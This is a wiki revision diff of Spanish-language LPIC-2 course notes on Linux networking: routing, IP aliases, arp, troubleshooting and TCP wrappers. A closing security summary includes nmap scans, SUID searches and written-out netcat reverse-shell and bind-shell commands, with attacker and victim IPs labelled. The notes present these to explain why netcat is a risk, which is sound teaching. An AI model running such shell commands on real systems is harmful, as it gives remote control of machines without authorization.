Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

--- info:cursos:pue:lpic2-2021:s7 [28/02/2021 09:48] – mate
+++ info:cursos:pue:lpic2-2021:s7 [18/09/2022 23:47] (actual) – [LPIC2 2021 Sesión 7 (2021-02-23)] mate
@@ Línia 1: / Línia 1: @@
-= LPIC2 2021 Sesión 7 (2021-02-23)
+= LPIC2 2021 Sesión 7 (2021-02-23) - raid, networking
 == Documentación relacionada:
   * Manual Certificacion LPIC-2.pdf, pag 72
@@ Línia 85: / Línia 85: @@
 === Cabina ISCSI
 <callout type="primary" icon="true">Pendiente próxima semana: cabinas discos con opneFiler</callout>
-  * Material Practicas LPIC-2/LPIC-201/4-Filesystem and Devices/Configuración Almacenamiento ISCSI
+<callout type="info" icon="true">Material Practicas LPIC-2/LPIC-201/4-Filesystem and Devices/Configuración Almacenamiento ISCSI ×</callout>
   * cabinas con openfiler, para conectarnos
   * [[http://clusterfrak.com/sysops/app_installs/openfiler_install/]]
@@ Línia 92: / Línia 92: @@
 === Networking Configuration
-==== documentos
+<callout type="info" icon="true">Manual Certificacion LPIC-2.pdf, pag 145 √</callout>
-    * doc: Manual Certificacion LPIC-2.pdf, pag 145
+<callout type="info" icon="true">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Configuración de Red en Red Hat Enterprise Linux.pdf √</callout>
-    * doc: Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Configuración de Red en Red Hat Enterprise Linux.pdf
+<callout type="info" icon="true">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Configurar la red en RedHat7.txt √</callout>
-    * doc: Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Configurar la red en RedHat7.txt
-==== comandos
+  * [[tcpip:ip:ipv6|]]
+=== Networking Configuration:comandos
   * ''ip a''
   * nombrar las tarjetas de red a **ethX**:
@@ Línia 107: / Línia 108: @@
   * desactivar IPv6 (si no se ha de utilizar) -> ¿como?
   * **NetworkManager**: nuevo gestor con perfiles, en sustitución del anterior
-  * **hostname**
+==== hostname
-    * centos7:
+  * centos7:
-      * **/etc/hostname**
+    * **/etc/hostname**
-      * ''hostnamectl set-hostname <FQDN>''
+    * ''hostnamectl set-hostname <FQDN>''
-    * centos6:
+  * centos6:
-      * **/etc/sysconfig/network**
+    * **/etc/sysconfig/network**
-  * modificar **/etc/hosts**
+  * modificar **/etc/hosts**: como buena práctica, que la máquina sepa resolverse a si misma
-    * como buena práctica, que sepa resolverse a si misma
+==== configuración cliente DNS
   * **/etc/resolv.conf**: servidores DNS para mi máquina
     * nameserver: servidores que resuelven
     * search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas)
     * domain: el dominio en el que trabajamos
+==== puertas de enlace
+definir rutas estáticas a otras redes
   * ''netstat -r''
-    * ''route add/del...''
+  * ''route add -net <red-destino> netmask <mascara> gw <dirección-gateway-salida>''
-  * alias IP (varias IPs en el mismo interfaz):
-    * ''vi /etc/sysconfig/network-scripts/ifcfg-<interfaz>''
+==== alias IP
-      * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0
+asignar varias IPs en el mismo interfaz
-      * añado IPADDR1 y NETMASK1 con diferente IP
+  * ''vi /etc/sysconfig/network-scripts/ifcfg-<interfaz>''
-      * ''systemctl restart network'' (o networkManager)
+    * renombro IPADDR a IPADDR0 y NETMASK a NETMASK0
-    * copiar /etc/sysconfig/network-scripts/ifcfg-<interfaz> en /etc/sysconfig/network-scripts/ifcfg-<interfaz>:0
+    * añado IPADDR1 y NETMASK1 con diferente IP
+    * ''systemctl restart network'' (o networkManager)
+  * copiar /etc/sysconfig/network-scripts/ifcfg-<interfaz> en /etc/sysconfig/network-scripts/ifcfg-<interfaz>:0
   * forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces:
     * **/etc/sysctl.conf** -> **net.ipv4.ip_forward = 1** -> ''sysctl -p'' (aplicar)
-  * **/etc/nsswitch.conf**: métodos de resolución usuarios
+* **/etc/nsswitch.conf**: métodos de resolución usuarios
   * **nmtui**: networkManager "GUI" <- en modo texto
     * ''yum install NetworkManager-tui -y''
@@ Línia 138: / Línia 146: @@
     * **/etc/network/interfaces**
     * ''service networking restart''<alert type="info">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Problemas de red en Linux.pdf</alert>
-=== Networking Configuration: Troubleshooting
-  * ''route''
+==== arp
   * ''arp''
+    * **-n**: consultar caché
+    * **-d <dirección-ip>**: borrar
+    * **-s <dirección-ip> <dirección -mac>**: asignar
+    * **-f <file>**: importa lista de direcciones mac-ip<code>dirección_mac1dirección_mac2...
+dirección_macndirección_ip1
+dirección_ip2
+dirección_ipn
+</code>
+=== Networking Configuration: Troubleshooting
   * ''ss'', ''netstat'' (deprecado por ss)
     * ''netstat -tan | grep -i listen'': que estoy ofreciendo TCP
     * ''netstat -putan | grep -i listen''
-  * ''nc'': netcat, navaja suiza <- desinstalar! <- ''yum remove nmap-ncat'' <label type="danger">problema de seguridad</label><alert type="info">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Explicacion Topic 110 Security.txt</alert>
+  * ''nc'': netcat, navaja suiza <- desinstalar! <- ''yum remove nmap-ncat'' <label type="danger">problema de seguridad</label>
     * shell reverso
       * ''nc -lvp 1234 -e /bin/sh &''
@@ Línia 160: / Línia 178: @@
     * ''ksar'': analizar los datos generados por un **sar**
-==== TCPWrappers
+=== Networking Configuration: TCPWrappers
+<callout type="info" icon="true">Manual Certificacion LPIC-2.pdf, pag 155</callout>
+Es posible administrar el acceso a un sistema Linux según la dirección IP o el nombre del host cliente. Se puede gestionar una lista de «todos los que están autorizados», o bien una lista de «todos los que están prohibidos». A pesar de que las modernas técnicas de intrusión y piratería informática vuelven este tipo de control de acceso casi insignificante, no deja de ser una forma de control de acceso rudimentaria que puededesalentar a curiosos. Además, la certificación LPI exige el conocimiento de estas técnicas de control de acceso.
+La implementación TCP Wrappers utilizada en los sistemas Linux se sustenta en la librería libwrap.
   * **/etc/host.allow**, **/etc/host.deny** : desuso (TCP wrappers)
-    * <alert type="info">Manual Certificacion LPIC-2.pdf, pag 155</alert>
+  * ''strings -f /usr/sbin/sshd | grep hosts_access'': programas que lo soportan
-    * <alert type="info">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Explicacion Topic 110 Security.txt</alert>
+  * 3 etapas de comprobación de acceso a un servicio embebido TCP:
-    * ''strings -f /usr/sbin/sshd | grep hosts_access'': programas que lo soportan
+    * está autorizado expresamente
-    * 3 etapas de comprobación de acceso a un servicio embebido TCP:
+    * está denegado expresamente
-      * está autorizado expresamente
+    * permitido por defecto
-      * está denegado expresamente
+  * usa expresiones en sus ficheros de configuración para permitir (o denegar)
-      * permitido por defecto
+    * ALL
-    * usa expresiones en sus ficheros de configuración para permitir (o denegar)
+    * LOCAL
-      * ALL
+    * UNKOWN
-      * LOCAL
+    * KNOWN
-      * UNKOWN
+    * PARANOID
-      * KNOWN
+    * EXCEPT
-      * PARANOID
+  * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla)
-      * EXCEPT
+<callout type="info" icon="true">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Problemas de red en Linux.pdf</callout>
-    * permitimos en **allow**, denegamos en **deny** (o tendrá acceso por la tercera regla)<alert type="info">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Problemas de red en Linux.pdf</alert>
+=== Resumen seguridad servicios
+<callout type="info" icon="true">Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Explicacion Topic 110 Security.txt</callout>
+<code>
+Resumen Seguridad de servicos y de red pagina 479 Manual curso LPIC-1
+find / -type f -perm -4000
+find / -type d -perm -2000
+find / -type d -perm -1000
+##El comando lsof le ayuda a determinar
+##qué proceso está utilizando un archivo del punto de montaje en el momento de iniciar el comando
+lsof /backup/
+lsof /backup/
+COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
+bash    8153 root  cwd    DIR   8,17     4096    2 /backup
+##Como administrador, puede iniciar fuser para forzar la parada de los procesos que estén accediendo al punto de montaje.
+fuser -km /backup
+kill -9 8153
+El comando nmap es un escaneador de puertos:
+yum install nmap -y
+nmap localhost
+namap -A 192.168.1.125
+yum install nmap-frontend -y
+zenmap
+-----------------------------------------------------------------------------------------------------------------
+###110.2 Setup host security##
+Servicios de red xinetd -->Pag del manual 419
+yum install xinetd
+Los archivos de configuración son:
+• /etc/xinetd.conf: configuración global
+• /etc/xinetd.d/*: directorio que contiene los archivos específicos para los servicios.
+Existe un archivo por servicio, con el mismo nombre que el especificado en /etc/services.
+##Si modificamos ficheros de configuracion reiniciamos los servicios
+service xinetd restart
+---------------------------------------------------------------------------------------------
+#############Los tcp_wrappers##########
+##Resumen manual de LPIC-1 pagina 484
+Los archivos de configuración son /etc/hosts.allow y /etc/hosts.deny
+##Cada programa que utiliza los tcp_wrappersse compila con la librería libwrap de manera estática
+ (el comando ldd no permite ver la librería).
+[root@sercentos7 ~]# strings -f /usr/sbin/sshd | grep hosts_access
+/usr/sbin/sshd: hosts_access
+Si no se devuelve ninguna línea, el programa no utiliza las tcp_wrappers.
+ Entre los servicios que utilizan las tcp_wrappers, encontramos:
+ • sendmail (incluyendo postfix);
+ • sshd (ssh);
+ • xinetd (y por lo tanto de manera indirecta todos los servicios asociados);
+ • vsftpd (ftp);
+ • portmap (y por lo tanto nis, nfs);
+ • in.telnetd (telnet), así como la mayoría de los servicios soportados por xinetd;
+La comprobación de acceso a un servicio embebido TCP se hace en tres etapas:
+• ¿se autoriza el acceso de manera explícita?
+ • si no es el caso, ¿se prohíbe el acceso de manera explícita?
+ • si no es el caso, por defecto, se autoriza el acceso.
+ Para verificar una regla, el sistema lee primero /etc/hosts.allow, luego /etc/hosts.deny.
+ La búsqueda se detiene en la primera correspondencia encontrada.
+ Una línea en hosts.allow autoriza la conexión.
+ Una línea en hosts.deny prohíbe la conexión.
+ Si no se deniega de manera explícita el acceso, se autoriza: la petición no corresponde a ningún criterio.
+ Los archivos de configuración son /etc/hosts.allow y /etc/hosts.deny. La sintaxis es común:
+En el ejemplo siguiente:
+• Sólo los miembros de la subred 192.168.1.0 tienen permiso para conectarse al servidor ftp (prohibido para todos los demás).
+• Los anfitriones puesto1 y puesto2 tienen acceso a telnet y portmap.
+• Los anfitriones de baddominio.org, excepto trusted, no tienen conexión alguna posible.
+• Se prohíbe el servicio pop/imap a todos los de la red 192.168.0.0, salvo 192.168.1.5.
+ /etc/hosts.allow
+ vsftpd: 192.168.1.
+ in.telnetd, portmap: puesto1, puesto2
+ ALL:/opt/script/supervisamen
+ servicio: lista_de_hosts [:shell_command]
+ # /etc/hosts.deny
+ ALL: .baddominio.org except trusted.baddominio.org UNKNOWN
+ vsftpd,in.telnetd,portmap: ALL
+ dovecot : 192.168.0. EXCEPT 192.168.0.5 UNKNOWN
+La lista de clientes admite una sintaxis avanzada:
+ • ALL: correspondencia sistemática.
+ • LOCAL: todos los anfitriones cuyo nombre no contiene punto (puesto1, puesto2, etc.).
+ • UNKNOWN: anfitrión cuyo nombre no se puede resolver.
+ • KNOWN: anfitrión cuyo nombre se puede resolver.
+ • PARANOID: anfitrión cuyo nombre no se puede resolver o cuyo IP no tiene resolución inversa.
+ • EXCEPT: permite excluir ciertos anfitriones.
+------------------------------------------------------------------------------------------------------------
+##Reverse Shell-Netcat:
+yum install nc -y
+$ sudo apt-get update -y
+$ sudo apt-get install netcat -y
+Este software esta presente en casi todas las distribuciones y es la manera mas sencilla de obener Reverse.
+Aun así en los sistemas en producción no suele estar disponible.
+##En la máquina del atacante 192.168.33.10 Centos8:
+nc -lvp 1234
+##En la máquina de la víctima 192.168.33.11 debian-10:
+nc -e /bin/sh 192.168.33.10 1234
+###Bind Shell- Netcat####:
+Una bind shell utilizando Netcat. Una bind shell se diferencia de la reverse en que la escucha se realiza en la máquina víctima.
+Para el ejemplo la ip de la víctima será la 10.10.10.2
+##En la máquina de la víctima debian-10 192.168.33.11:
+nc -lvp 1234 -e /bin/sh &
+##En la máquina del atacante, 192.168.33.11 es la maquina victima:
+nc 192.168.33.11 1234
+</code>